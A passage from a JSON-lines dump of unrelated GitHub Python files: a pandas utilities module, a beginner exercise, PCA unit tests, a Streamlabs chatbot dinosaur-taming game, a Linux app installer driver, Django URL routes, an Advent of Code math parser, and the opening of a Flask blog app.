import data\n\ndef interpolate_na(df: pd.DataFrame, cols: list, inplace=True):\n    if inplace:\n        for col in cols:\n            df[col].ffill(inplace=True)\n            df[col].bfill(inplace=True)\n\n            df[col].interpolate(inplace=True) \n\n            df[col].fillna(df[col].cummax(), inplace=True)\n\n    else:\n        # operate on a copy so the caller's DataFrame is left untouched\n        new_df = df.copy()\n        for col in cols:\n            new_df[col] = new_df[col].ffill()\n            new_df[col] = new_df[col].bfill()\n\n            new_df[col] = new_df[col].interpolate()\n\n            new_df[col] = new_df[col].fillna(new_df[col].cummax())\n\n        return new_df\n\n\ndef map_hour_to_seasonal(df, hour_col):\n    mapping = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6,\n               7: 7, 8: 8, 9: 9, 10: 10, 11: 11, 12: 12,\n               13: 11, 14: 10, 15: 9, 16: 8, 17: 7, 18: 6,\n               19: 5, 20: 4, 21: 3, 22: 2, 23: 1, 24: 0,}\n    df[hour_col].replace(mapping, inplace=True)\n\ndef map_month_to_seasonal(df, month_col):\n    mapping = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6,\n               7: 5, 8: 4, 9: 3, 10: 2, 11: 1, 12: 0}\n    \n    df[month_col].replace(mapping, inplace=True)\n\n# list with 'y_pred'\n\ndef y_pred_to_csv(file_name, df):\n    df[['y_pred']].reset_index(drop=True).reset_index().rename(columns={'index': 'id', 'y_pred': 'prediction'}).to_csv(module_dir + "/../submissions/" + file_name, index=False)\n\ndef make_submittable(file_name, model = None, model_dict = None):\n    \"\"\"\n    model if same model used for all locations\n    model dict if not\n\n    model is instance of model (model = MetaModel())\n    model dict uses location as key ({"A": MetaModel(), "B": MetaModel(), "C": MetaModel()})\n    \"\"\"\n\n    df = data.get_training_cleaned()\n    test = data.get_testing_flattened()\n    ret = pd.DataFrame()\n    \n    for location in ['A', 'B', 'C']:\n        temp_df = df[df['location']==location]\n        temp_test = test[test['location']==location]\n\n        if model is not None:\n            m = model\n        elif model_dict is not None:\n            m = model_dict[location]\n        else:\n            raise ValueError("no model specified")\n        \n        m.train(temp_df)\n        fcst = m.predict(temp_test)\n\n        ret = pd.concat([ret, fcst])\n\n    y_pred_to_csv(file_name, ret)","repo_name":"jacob-a-worsoe/stabekk","sub_path":"ml_combat/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23707571689","text":"a = 3\nb = 4\nab = 12\nprint(a,"multiplied by",b,"is",ab)\n\nname = "Bill & Aileen M."\naddress = "975 Bennett Drive"\ncity = "Longwood, "\nzipcode = "FL 32750"\nprint(name)\nprint(address)\nprint(city+zipcode)\n\nl= 5\nh = 6\nw = 2\nlh = l*h\nlw = l*w\nhw = h*w\nsurfaceArea =(lh+lw+hw+lh+lw+hw)\nprint("The surface area of your rectangle is", surfaceArea)\n\n\n\n\n","repo_name":"AndreaxMoore/Moore_Andrea","sub_path":"PyLesson_02/Lab_02.py","file_name":"Lab_02.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38713209625","text":"\"\"\"module contains unittests for pca\"\"\"\nimport unittest\nfrom unittest.mock import patch\nfrom unittest.mock import Mock\n\nimport numpy as np\nimport pytest\n\nfrom gn3.computations.pca import cache_pca_dataset\nfrom gn3.computations.pca import generate_pca_temp_traits\nfrom gn3.computations.pca import generate_scree_plot_data\nfrom gn3.computations.pca import process_factor_loadings_tdata\n\n\nclass TestPCA(unittest.TestCase):\n    \"\"\"pca testcase class\"\"\"\n\n    @pytest.mark.unit_test\n    def test_process_factor_loadings(self):\n        \"\"\"test for processing factor loadings\"\"\"\n\n        test_array = np.array([\n            [-0.23511749, -0.61483617, 
-0.26872797, 0.70319381],\n [-0.71057342, 0.4623377, -0.52921008, -0.0355803],\n [-0.60977093, -0.02877103, 0.78874096, 0.07238328],\n [0.26073856, 0.63827311, 0.16003023, 0.70640864]\n ])\n\n expected_results = [[-0.23511749, -0.71057342, -0.60977093],\n [-0.61483617, 0.4623377, -0.02877103],\n [-0.26872797, -0.52921008, 0.78874096],\n [0.70319381, -0.0355803, 0.07238328]]\n\n self.assertEqual(process_factor_loadings_tdata(\n test_array, 3), expected_results)\n\n @pytest.mark.unit_test\n @patch(\"gn3.computations.pca.generate_pca_traits_vals\")\n def test_generate_pca_datasets(self, mock_pca_data):\n \"\"\"test for generating temp pca dataset\"\"\"\n\n mock_pca_data.return_value = np.array([[21, 10, 17, 15, 13],\n [21, 11, 18,\n 9, 1],\n [22, 16, 0,\n 0.22667229, -1],\n [31, 12, 10, 17, 11]])\n\n shared_samples = [\"BXD1\", \"BXD2\", \"BXD\", \"BXD4\", \"Unkown\"]\n\n dataset_samples = [\"BXD1\", \"BXD5\", \"BXD4\", \"BXD\"]\n expected_results = {\n \"PCA1_mouse_G1_now\": [\"21.0\", \"x\", \"10.0\", \"17.0\"],\n \"PCA2_mouse_G1_now\": [\"21.0\", \"x\", \"11.0\", \"18.0\"],\n \"PCA3_mouse_G1_now\": [\"22.0\", \"x\", \"16.0\", \"0.0\"],\n \"PCA4_mouse_G1_now\": [\"31.0\", \"x\", \"12.0\", \"10.0\"]\n }\n\n results = generate_pca_temp_traits(species=\"mouse\", group=\"G1\",\n traits_data=[],\n dataset_samples=dataset_samples,\n corr_array=[],\n shared_samples=shared_samples,\n create_time=\"now\")\n\n self.assertEqual(results, expected_results)\n\n @pytest.mark.unit_test\n def test_generate_scree_plot(self):\n \"\"\"test scree plot data is generated\"\"\"\n\n variance = [0.9271, 0.06232, 0.031]\n\n self.assertEqual(generate_scree_plot_data(variance),\n (['PC1', 'PC2', 'PC3'], [92.7, 6.2, 3.1]))\n\n @pytest.mark.unit_test\n def test_cache_pca_datasets(self):\n \"\"\"test for caching pca datasets\"\"\"\n\n pca_traits = {\n \"PCA_1\": [\"11.0\", \"x\", \"9.0\", \"7.0\"],\n \"PCA_2\": [\"x\", \"x\", \"1.2\", \"3.1\"]\n }\n\n self.assertEqual(cache_pca_dataset(redis_conn={}, exp_days=30,\n pca_trait_dict=pca_traits), False)\n\n mock_redis = Mock()\n mock_redis.set.return_value = True\n\n test_data = [({}, 30, pca_traits, False),\n (mock_redis, 30, pca_traits, True)]\n\n for (test_redis, exp_day, test_traits, expected) in test_data:\n\n with self.subTest(redis_conn=test_redis,\n exp_days=exp_day, pca_trait_dict=test_traits):\n\n self.assertEqual(cache_pca_dataset(\n test_redis, exp_day, test_traits), expected)\n","repo_name":"genenetwork/genenetwork3","sub_path":"tests/unit/computations/test_pca.py","file_name":"test_pca.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"24060677223","text":"import os\nimport sys\nimport clr\nimport codecs\nimport re\nimport json\nimport threading\n\n# Required script variables\nScriptName = \"Catch the Dino\"\nDescription = \"Win points taming dinosaurs from all sizes!\"\nCreator = \"LuisSanchezDev\"\nWebsite = \"https://www.fiverr.com/luissanchezdev\"\nVersion = \"1.0.1\"\n\n# Define Global Variables\nglobal PATH, CONFIG_FILE, SETTINGS\nPATH = os.path.dirname(os.path.realpath(__file__))\nCONFIG_FILE = os.path.join(PATH, \"config.json\")\nSETTINGS = {}\n\n\n# Initialize Data (Only called on load)\ndef Init():\n global SETTINGS, CONFIG_FILE\n \n try:\n with codecs.open(CONFIG_FILE, encoding='utf-8-sig', mode='r') as file:\n SETTINGS = json.load(file, encoding='utf-8-sig')\n except Exception as error:\n SETTINGS = {\n \"command\": \"!tame\",\n \"cmd_feed\": 
\"!feed\",\n \"usercd\": 30,\n \"globalcd\": 3,\n \"firstline\": \"$user attempts to tame $adjective $dino\",\n \"firsttosecondwait\": 5,\n \"secondline\": \". . .\",\n \"secondtothirdwait\": 5,\n \"thirdtofourthwait\": 5,\n \"win_line\": \"$user won $points $currency for taming a $adjective $dino!\",\n \"win_response\": \"This dino is tamed!!\",\n \"lose_response\": \"This dino ran away\",\n \"tame_prize\": 10,\n \"small_mult\": 1,\n \"medium_mult\": 2,\n \"big_mult\": 3,\n \"feed_msg_win\": \"The $adjective $dino ate the food peacefully, you win $prize $currency\",\n \"feed_msg_lose\": \"The $adjective $dino growls at you, better luck next time\",\n\n }\n\n# Execute Data / Process messages\ndef Execute(data):\n global SETTINGS\n if data.IsChatMessage():\n if data.GetParam(0) == SETTINGS[\"cmd_feed\"]:\n size = get_random_size()\n dinosaur = get_dinosaur_of_size(size)\n success = Parent.GetRandom(0, 100) >= 50\n if success:\n points = SETTINGS[\"tame_prize\"] * SETTINGS[size + \"_mult\"] / 3\n output = SETTINGS[\"feed_msg_win\"]\n output = output.replace( '$dino' ,dinosaur)\n output = output.replace('$adjective',size)\n output = output.replace( '$user' ,data.User)\n output = output.replace( '$prize' ,str(points))\n output = output.replace('$currency' ,Parent.GetCurrencyName())\n Parent.SendStreamMessage((output))\n Parent.AddPoints(data.User, data.User, points)\n else:\n output = SETTINGS[\"feed_msg_lose\"]\n output = output.replace( '$dino' ,dinosaur)\n output = output.replace('$adjective',size)\n Parent.SendStreamMessage(output)\n return\n elif not data.GetParam(0) == SETTINGS['command']: return\n if Parent.IsOnUserCooldown(ScriptName, SETTINGS[\"command\"], data.User) and int(SETTINGS[\"usercd\"]) > 0:\n output = get_random_user_cd_response()['name'].replace('$user',data.User)\n output = output.replace('$randusername',Parent.GetRandomActiveUser())\n Parent.SendStreamMessage(output)\n return\n if Parent.IsOnCooldown(ScriptName, SETTINGS[\"command\"]) and int(SETTINGS[\"globalcd\"]) > 0:\n output = get_random_global_cd_response()['name'].replace('$user',data.User)\n output = output.replace('$randusername',Parent.GetRandomActiveUser())\n Parent.SendStreamMessage(output)\n return\n\n size = get_random_size()\n dinosaur = get_dinosaur_of_size(size)\n success = get_random_success()\n \n firstline = SETTINGS['firstline']\n firstline = firstline.replace('$user' ,data.User)\n firstline = firstline.replace('$adjective', size)\n firstline = firstline.replace('$dino' ,dinosaur)\n Parent.SendStreamMessage(firstline)\n \n threading.Timer(SETTINGS['firsttosecondwait'],lambda: Parent.SendStreamMessage(SETTINGS['secondline'])).start()\n lastlineswait = SETTINGS['firsttosecondwait'] + SETTINGS['secondtothirdwait']\n \n successline = success['name']\n successline = successline.replace('$dino',dinosaur)\n successline = successline.replace('$user',data.User)\n threading.Timer(lastlineswait,lambda: Parent.SendStreamMessage(successline)).start()\n \n if success[\"success\"]:\n points = SETTINGS[\"tame_prize\"] * SETTINGS[size + \"_mult\"]\n\n output = SETTINGS[\"win_line\"]\n output = output.replace( '$dino' ,dinosaur)\n output = output.replace('$adjective',size)\n output = output.replace( '$user' ,data.User)\n output = output.replace( '$points' ,str(points))\n output = output.replace('$currency' ,Parent.GetCurrencyName())\n threading.Timer(lastlineswait + SETTINGS['thirdtofourthwait'],lambda: Parent.SendStreamMessage(output)).start()\n threading.Timer(lastlineswait + SETTINGS['thirdtofourthwait'],lambda: 
Parent.AddPoints(data.User,data.UserName,points)).start()\n Parent.AddUserCooldown(ScriptName, SETTINGS[\"command\"], data.User, int(SETTINGS[\"usercd\"]) * 60)\n Parent.AddCooldown(ScriptName, SETTINGS[\"command\"], int(SETTINGS[\"globalcd\"]) * 60)\n\n# Tick method (Gets called during every iteration even when there is no incoming data)\ndef Tick():\n pass\n\ndef get_random_size():\n sizes = [\n {\"size\": \"small\", \"probability\": 70},\n {\"size\": \"medium\", \"probability\": 20},\n {\"size\": \"big\", \"probability\": 10}\n ]\n sizes = sorted(sizes, key=lambda x: x['probability'])\n last_cumulative_prob = 0.0\n for size in sizes:\n size['cumulativeprobability'] = last_cumulative_prob + size['probability']\n last_cumulative_prob = size['cumulativeprobability']\n return get_weighted_random(sizes)[\"size\"]\n\ndef get_random_success():\n successes = [\n {\"name\": SETTINGS[\"win_response\"], \"success\": True, \"probability\": 70},\n {\"name\": SETTINGS[\"lose_response\"], \"success\": False, \"probability\": 30},\n ]\n successes = sorted(successes, key=lambda x: x['probability'])\n last_cumulative_prob = 0.0\n for success in successes:\n success['cumulativeprobability'] = last_cumulative_prob + success['probability']\n last_cumulative_prob = success['cumulativeprobability']\n return get_weighted_random(successes)\n\ndef get_dinosaur_of_size(size):\n dino_file = os.path.join(PATH, \"config\",size + \".txt\")\n lines = list(open(dino_file))\n if len(lines) > 0:\n return lines[Parent.GetRandom(0, len(lines))].replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n\ndef get_random_user_cd_response():\n return get_weighted_random(load_user_cd_responses())\ndef get_random_global_cd_response():\n return get_weighted_random(load_global_cd_responses())\ndef get_weighted_random(inputlist):\n dice = Parent.GetRandom(0, inputlist[-1][\"cumulativeprobability\"])\n for entry in inputlist:\n if entry['cumulativeprobability'] >= dice:\n return entry\n\ndef load_user_cd_responses():\n return parse_list_file('config\\\\usercd_responses.json')\ndef load_global_cd_responses():\n return parse_list_file('config\\\\globalcd_responses.json')\ndef parse_list_file(filename):\n global PATH\n content = []\n try:\n with codecs.open(os.path.join(PATH, filename), encoding='utf-8-sig', mode='r') as file:\n content = json.load(file, encoding='utf-8-sig')\n except Exception as error:\n Parent.Log('ERROR','Error!' 
+ str(error))\n return []\n \n try:\n parsedcontent = sorted(content, key = lambda x : x['probability'])\n except:\n MessageBox.Show(str(content))\n return\n lastprob = 0.0\n for line in parsedcontent:\n line['cumulativeprobability'] = lastprob + line['probability']\n lastprob = line['cumulativeprobability']\n return parsedcontent\n\n# UI Buttons\ndef edit_small_dinos():\n file_path = os.path.join(PATH, \"config\", \"small.txt\")\n os.startfile(file_path)\ndef edit_medium_dinos():\n file_path = os.path.join(PATH, \"config\", \"medium.txt\")\n os.startfile(file_path)\ndef edit_big_dinos():\n file_path = os.path.join(PATH, \"config\", \"big.txt\")\n os.startfile(file_path)\ndef edit_global_cd():\n file_path = os.path.join(PATH, \"config\", \"small.txt\")\n os.startfile(file_path)\ndef donate():\n os.startfile(\"https://streamlabs.com/luissanchezdev/tip\")\ndef open_contact_me():\n os.startfile(\"https://www.fiverr.com/luissanchezdev\")\ndef open_contact_td():\n os.startfile(\"https://www.fiverr.com/tecno_diana\")\ndef open_readme():\n os.startfile(\"https://github.com/LuisSanchez-Dev/catch-the-dino\")","repo_name":"LuisSanchez-Dev/catch-the-dino","sub_path":"CatchtheDino_StreamlabsSystem.py","file_name":"CatchtheDino_StreamlabsSystem.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43137627475","text":"import os\nimport json\nfrom apps.app_dnf import update_software\nfrom apps.app_dnf import upgrade_software\nfrom apps.app_dnf import install_software\nfrom apps.app_yum import install_software_yum\nfrom apps.app_snap import install_software_snap\nfrom apps.app_manual import install_manual_software\nimport logging\n#import sys\n#sys.path.insert(1, '../config')\nimport config.settings\n\nappsFile = \"apps/apps.json\"\nf_null = open(os.devnull, 'w')\ninstaller_text = \"Status: install ok installed\"\n\n\ndef install(software_installation_type, name, description, software_check, software, pre_commands, post_commands,\n software_url, software_extra_pre_argument, software_extra_post_argument, install_group):\n result = 0\n logging.info(\"Installing %s over %s\", name, software_installation_type)\n if software_installation_type == 'manual':\n result = install_manual_software(software, software_url)\n elif software_installation_type == 'snap':\n result = install_software_snap(name, description, software_check, software, pre_commands, post_commands,\n software_extra_pre_argument, software_extra_post_argument)\n elif software_installation_type == 'yum':\n result = install_software_yum(name, description, software_check, software, pre_commands, post_commands,\n software_extra_pre_argument, software_extra_post_argument)\n else:\n result = install_software(name, description, software_check, software, pre_commands, post_commands,\n software_extra_pre_argument, software_extra_post_argument, install_group)\n return result\n\n\n# install_software(vim_app, None, vim_app, None)\n\ndef install_apps():\n logging.info(\"Installing apps\")\n \"\"\" Software \"\"\"\n apps_file = open(appsFile)\n logging.debug(\"File %s get.\", appsFile)\n applications = json.load(apps_file)\n logging.debug(\"File %s loaded on JSON format\", appsFile)\n update_software()\n upgrade_software()\n for app in applications:\n name = app[\"name\"]\n description = app[\"description\"]\n software_check = app[\"software_check\"]\n type_installation = app[\"type\"]\n software = app[\"software\"]\n pre_commands = app[\"pre_commands\"]\n 
post_commands = app[\"post_commands\"]\n url = app[\"url\"]\n extra_pre_argument = app[\"extra_pre_argument\"]\n extra_post_argument = app[\"extra_post_argument\"]\n install_group = app[\"install_group\"]\n install(type_installation, name, description, software_check, software, pre_commands, post_commands, url, extra_pre_argument, extra_post_argument, install_group)\n\n\ninstall_apps()\n","repo_name":"ironcero/linuxtunning","sub_path":"apps/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31145607389","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom .views import remove_friend, profile_subs, profile_friends, get_profile, add_friend, create_post, register, user_login, profile, index, change_data, change_bio, change_username, user_logout\n\nurlpatterns = [\n path('', index, name='index'),\n path('register/', register, name='user_register'),\n path('login/', user_login, name='user_login'),\n path('/', profile, name='profile'),\n path('change_data//', change_data, name='change_data'),\n path('create_post', create_post, name=\"create_post\"),\n path('change_username', change_username, name='change_username'),\n path('change_bio', change_bio, name='change_bio'),\n path('add_friend//', add_friend, name='add_friend'),\n path('remvoe_friend//', remove_friend, name='remove_friend'),\n path('get_profile', get_profile, name='get_profile'),\n path('user_logout', user_logout, name='user_logout'),\n path(\"profile//subs\", profile_subs, name='profile_subs'),\n path(\"profile//friends\", profile_friends, name='profile_friends')\n]","repo_name":"Basekeet/django-twitter","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37530919660","text":"\"\"\"\nFile taking three segmentation images (paths) as input and computing the dice metric to evaluate\nhow well the images are registered.\nThe dice scores are saved in a csv file.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\nimport numpy as np\nimport nibabel as nib\nimport csv\nimport datetime\n\n\nif __name__ == \"__main__\":\n\n # -------------------------------------------------------------------------------------------------------- #\n # ---- PARSER ARGUMENTS ---- #\n # -------------------------------------------------------------------------------------------------------- #\n\n # parse command line\n p = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description=f'Evaluate the registration of two volumes')\n\n # path parameters\n p.add_argument('--fx-seg-path', required=True, help='path to the spinal cord segmentation of the fixed image')\n p.add_argument('--moving-seg-path', required=True, help='path to the spinal cord segmentation of the moving image')\n p.add_argument('--warped-seg-path', required=True, help='path to the spinal cord segmentation of the moved image')\n\n p.add_argument('--sub-id', required=True, help='id of the subject')\n\n p.add_argument('--out-file', required=False, default='metrics_on_sc_seg.csv',\n help='path to csv summarizing the results obtained on the SC segmentation with different metrics')\n p.add_argument('--append', type=int, required=False, default=1, choices=[0, 1],\n help=\"Append results as a new line in the output csv file instead of overwriting it.\")\n\n 
p.add_argument('--min-dice', required=False, type=int, default=0,\n help=\"Minimum Dice score expected (percentage, to deal with int). If lower and not last-eval then \"\n \"return a sys.exit(1) to signal this low score in the bash script and proceed to an \"\n \"affine registration prior to the model's one\")\n p.add_argument('--last-eval', type=int, required=False, default=1, choices=[0, 1],\n help='Determine if this is the last evaluation that will be done (1) or not (0)')\n\n arg = p.parse_args()\n\n # -------------------------------------------------------------------------------------------------------- #\n # ---- LOADING THE VOLUMES ---- #\n # -------------------------------------------------------------------------------------------------------- #\n\n if len(arg.fx_seg_path.split('.')) > 1:\n fx_im = nib.load(arg.fx_seg_path)\n else:\n fx_im = nib.load(f'{arg.fx_seg_path}.nii.gz')\n\n if len(arg.moving_seg_path.split('.')) > 1:\n moving_im = nib.load(arg.moving_seg_path)\n else:\n moving_im = nib.load(f'{arg.moving_seg_path}.nii.gz')\n\n if len(arg.warped_seg_path.split('.')) > 1:\n moved_im = nib.load(arg.warped_seg_path)\n else:\n moved_im = nib.load(f'{arg.warped_seg_path}.nii.gz')\n\n fx_im_val = fx_im.get_fdata()\n moving_im_val = moving_im.get_fdata()\n moved_im_val = moved_im.get_fdata()\n\n # -------------------------------------------------------------------------------------------------------- #\n # ---- COMPUTE METRICS BASED ON SC SEGMENTATION OVERLAP ---- #\n # -------------------------------------------------------------------------------------------------------- #\n\n # TP --> SC seg in moving and in fixed\n # FP --> SC seg in moving but not in fixed (background)\n # TN --> Background in moving and in fixed\n # FN --> Background in moving but not in fixed (sc seg)\n\n TP_moving = np.sum(moving_im_val[fx_im_val == 1])\n FP_moving = np.sum(moving_im_val[fx_im_val == 0])\n TN_tmp_moving = moving_im_val[fx_im_val == 0]\n TN_moving = len(np.ravel(TN_tmp_moving)) - np.sum(TN_tmp_moving)\n FN_tmp_moving = moving_im_val[fx_im_val == 1]\n FN_moving = len(np.ravel(FN_tmp_moving)) - np.sum(FN_tmp_moving)\n\n TP_moved = np.sum(moved_im_val[fx_im_val == 1])\n FP_moved = np.sum(moved_im_val[fx_im_val == 0])\n TN_tmp_moved = moved_im_val[fx_im_val == 0]\n TN_moved = len(np.ravel(TN_tmp_moved)) - np.sum(TN_tmp_moved)\n FN_tmp_moved = moved_im_val[fx_im_val == 1]\n FN_moved = len(np.ravel(FN_tmp_moved)) - np.sum(FN_tmp_moved)\n\n nb_vox_moving = len(np.ravel(moving_im_val))\n nb_sc_vox_moving = np.sum(moving_im_val)\n nb_vox_moved = len(np.ravel(moved_im_val))\n nb_sc_vox_moved = np.sum(moved_im_val)\n\n # Dice --> (2 * TP) / ((FP + TP) + (TP + FN))\n dice_fx_moving = (2 * TP_moving) / (TP_moving + TP_moving + FP_moving + FN_moving)\n dice_fx_moved = (2 * TP_moved) / (TP_moved + TP_moved + FP_moved + FN_moved)\n\n if 100 * dice_fx_moved < arg.min_dice and not arg.last_eval:\n sys.exit(1)\n\n # Sensitivity --> TP / (TP + FN)\n sens_fx_moving = TP_moving / (TP_moving + FN_moving)\n sens_fx_moved = TP_moved / (TP_moved + FN_moved)\n\n # Specificity --> TN / (TN + FP)\n spec_fx_moving = TN_moving / (TN_moving + FP_moving)\n spec_fx_moved = TN_moved / (TN_moved + FP_moved)\n\n # Accuracy --> (TP + TN) / (TP + FP + FN + TN)\n acc_fx_moving = (TP_moving + TN_moving) / nb_vox_moving\n acc_fx_moved = (TP_moved + TN_moved) / nb_vox_moved\n\n # Precision --> TP / (TP + FP)\n prec_fx_moving = TP_moving / nb_sc_vox_moving\n prec_fx_moved = TP_moved / nb_sc_vox_moved\n\n # Jaccard (IoU) --> TP / 
(FP + TP + FN)\n jacc_fx_moving = TP_moving / (TP_moving + FP_moving + FN_moving)\n jacc_fx_moved = TP_moved / (TP_moved + FP_moved + FN_moved)\n\n res_summary = dict()\n res_summary['subject'] = arg.sub_id\n res_summary['dice_before_registration'] = dice_fx_moving\n res_summary['dice_after_registration'] = dice_fx_moved\n res_summary['jaccard_before_registration'] = jacc_fx_moving\n res_summary['jaccard_after_registration'] = jacc_fx_moved\n res_summary['sensitivity_before_registration'] = sens_fx_moving\n res_summary['sensitivity_after_registration'] = sens_fx_moved\n res_summary['precision_before_registration'] = prec_fx_moving\n res_summary['precision_after_registration'] = prec_fx_moved\n res_summary['specificity_before_registration'] = spec_fx_moving\n res_summary['specificity_after_registration'] = spec_fx_moved\n res_summary['accuracy_before_registration'] = acc_fx_moving\n res_summary['accuracy_after_registration'] = acc_fx_moved\n\n # write header (only if append=False)\n if not arg.append or not os.path.isfile(arg.out_file):\n with open(arg.out_file, 'w') as csvfile:\n header = ['Timestamp', 'Subject', 'Dice_before_registration', 'Dice_after_registration',\n 'Jaccard_before', 'Jaccard_after',\n 'Sensitivity_before', 'Sensitivity_after', 'Precision_before', 'Precision_after',\n 'Specificity_before', 'Specificity_after', 'Accuracy_before', 'Accuracy_after']\n writer = csv.DictWriter(csvfile, fieldnames=header)\n writer.writeheader()\n\n # populate data\n with open(arg.out_file, 'a') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=',')\n line = list()\n line.append(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")) # Timestamp\n for val in res_summary.keys():\n line.append(str(res_summary[val]))\n spamwriter.writerow(line)\n\n sys.exit(0)\n","repo_name":"ivadomed/multimodal-registration","sub_path":"eval_reg_on_sc_seg.py","file_name":"eval_reg_on_sc_seg.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"72204966312","text":"#!/usr/bin/env python\n\"\"\"Math parser.\n\nInitial messy code: 0.177/6.108/4.791 ms\nI could reverse the tokens to make life easier but that feels like cheating.\nPart 1, non-parameterized conds test: 3.313 ms\nWith the tree parser: 0.178/4.177/4.783 ms\n\"\"\"\n\nfrom typing import Callable, List, Optional\nfrom lib import aoc\n\n\nclass Node:\n \"\"\"A node can either be a single number or two nodes with an operator.\"\"\"\n\n def __init__(self, a, op=None, b=None):\n self.a = a\n self.op = op\n self.b = b\n assert (op is None) == (b is None)\n if op is None:\n assert a.isnumeric()\n assert b is None\n else:\n assert isinstance(a, type(self))\n assert isinstance(b, type(self))\n\n def compute(self) -> int:\n if self.op is None:\n return int(self.a)\n # Moving these for a map kills runtime.\n elif self.op == '*':\n return self.a.compute() * self.b.compute()\n elif self.op == '+':\n return self.a.compute() + self.b.compute()\n else:\n raise RuntimeError\n\n def __str__(self):\n if self.op is None:\n return self.a\n else:\n return f'({self.a} {self.op} {self.b})'\n\n\nclass Day18(aoc.Challenge):\n\n TESTS = (\n aoc.TestCase(part=1, inputs=\"2 * 3 + (4 * 5)\", want=26),\n aoc.TestCase(part=1, inputs=\"5 + (8 * 3 + 9 + 3 * 4 * 3)\", want=437),\n aoc.TestCase(part=1, inputs=\"5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))\", want=12240),\n aoc.TestCase(part=1, inputs=\"((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2\", want=13632),\n 
aoc.TestCase(part=2, inputs=\"1 + (2 * 3) + (4 * (5 + 6))\", want=51),\n aoc.TestCase(part=2, inputs=\"2 * 3 + (4 * 5)\", want=46),\n aoc.TestCase(part=2, inputs=\"5 + (8 * 3 + 9 + 3 * 4 * 3)\", want=1445),\n aoc.TestCase(part=2, inputs=\"5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))\", want=669060),\n aoc.TestCase(part=2, inputs=\"((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2\", want=23340),\n )\n\n def input_parser(self, puzzle_input: str) -> List[str]:\n \"\"\"Drop whitespace.\"\"\"\n return [line.replace(\" \", \"\") for line in puzzle_input.split('\\n')]\n\n def part1(self, parsed_input: List[str]) -> int:\n \"\"\"Treat + and * equally.\"\"\"\n conds = [lambda x: x in '+*']\n return self.sum_map(parsed_input, lambda x: self.solve(x, conds))\n\n def part2(self, parsed_input: List[str]) -> int:\n \"\"\"Split on * first making it lower precendent than +.\"\"\"\n conds = [lambda x: x == '*', lambda x: x == '+']\n return self.sum_map(parsed_input, lambda x: self.solve(x, conds))\n\n def solve(self, tokens: List[str], f: List[Callable[[str], bool]]) -> int:\n \"\"\"Tokenize, create tree and math the tree.\"\"\"\n return self.make_tree(self.tokenize(tokens), f).compute()\n\n def get_split_for(self, tokens: List[str], conds: List[Callable[[str], bool]]) -> Optional[int]:\n \"\"\"Return the split-point, respecting (x) as one block.\"\"\"\n for cond in conds:\n i = len(tokens) - 1\n depth = 0\n while i >= 0:\n if depth == 0 and cond(tokens[i]):\n return i\n if tokens[i] == ')':\n depth += 1\n elif tokens[i] == '(':\n depth -= 1\n i -= 1\n return None\n\n def make_tree(self, tokens: List[str], conds: List[Callable[[str], bool]]):\n \"\"\"Build a tree, arbitrary ordering based on the conds.\"\"\"\n def _go(tkns):\n if len(tkns) == 1:\n return Node(tkns[0])\n # Find the right-most operator and split on that. Treat parens as a block.\n i = self.get_split_for(tkns, conds)\n if i is None:\n # Ran out of tokens. 
Must be \"(exp)\".\n assert tkns[0] == '(' and tkns[-1] == ')'\n return _go(tkns[1:-1])\n else:\n left = _go(tkns[:i])\n op = tkns[i]\n right = _go(tkns[i + 1:])\n return Node(left, op, right)\n return _go(tokens)\n\n def tokenize(self, line: str) -> List[str]:\n \"\"\"Tokenize the input into strings of nums/+/*/().\"\"\"\n tokens = []\n i = 0\n ll = len(line)\n while i < ll:\n ss = line[i]\n if ss in '()+*':\n tokens.append(ss)\n i += 1\n else:\n j = i + 1\n while j < ll and line[j] not in '()+*':\n j += 1\n tokens.append(line[i:j])\n i = j\n return tokens\n","repo_name":"IsaacG/Advent-of-Code","sub_path":"2020/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"16084025784","text":"import os,json\nfrom sqlite3 import dbapi2 as sqlite3\nfrom flask import Flask, request, session, g, redirect, url_for, abort, \\\n render_template, flash\n\nfrom werkzeug import secure_filename\n\n\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import Markup\nimport markdown2\nfrom flask import send_from_directory\n\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\n\n# create our little application :)\napp = Flask(__name__)\n\n# Load default config and override config from an environment variable\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'pymark.db'),\n DEBUG=True,\n UPLOAD_FOLDER = os.path.join(app.root_path, 'uploads'),\n SECRET_KEY='development key',\n BLOGNAME = \"PyMark BLog\",\n USERNAME='admin',\n 